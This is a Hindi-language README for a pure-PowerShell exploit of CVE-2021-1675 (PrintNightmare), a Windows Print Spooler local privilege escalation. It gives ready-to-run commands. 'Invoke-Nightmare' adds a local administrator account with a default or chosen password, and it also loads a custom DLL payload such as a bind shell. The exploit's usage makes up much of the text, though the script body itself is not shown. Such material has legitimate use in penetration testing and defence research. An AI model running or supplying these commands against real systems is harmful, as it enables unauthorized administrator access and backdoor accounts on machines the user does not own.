
CVE-2021-1675 Print Spooler स्थानीय विशेषाधिकार वृद्धि (PrintNightmare) का शुद्ध PowerShell कार्यान्वयन
Caleb Stewart | John Hammond | July 1, 2021
CVE-2021-1675 एक गंभीर रिमोट कोड निष्पादन और स्थानीय विशेषाधिकार वृद्धि भेद्यता है जिसे "PrintNightmare" नाम दिया गया है।
प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जारी किए गए हैं (Python, C++) रिमोट कोड निष्पादन क्षमता के लिए, और स्थानीय विशेषाधिकार वृद्धि के लिए एक C# संस्करण। हमने शुद्ध PowerShell में एक मूल कार्यान्वयन नहीं देखा था, और हम एक्सप्लॉइट को परिष्कृत और पुनः तैयार करने का प्रयास करना चाहते थे।
यह PowerShell स्क्रिप्ट PrintNightmare आक्रमण तकनीक के साथ स्थानीय विशेषाधिकार वृद्धि (LPE) करती है।

यह विंडोज सर्वर 2016 और विंडोज सर्वर 2019 पर परीक्षण किया गया है।
डिफ़ॉल्ट रूप से स्थानीय प्रशासक समूह में एक नया उपयोगकर्ता जोड़ें:
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
कोई अन्य कार्य करने के लिए एक कस्टम DLL पेलोड प्रदान करें।
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"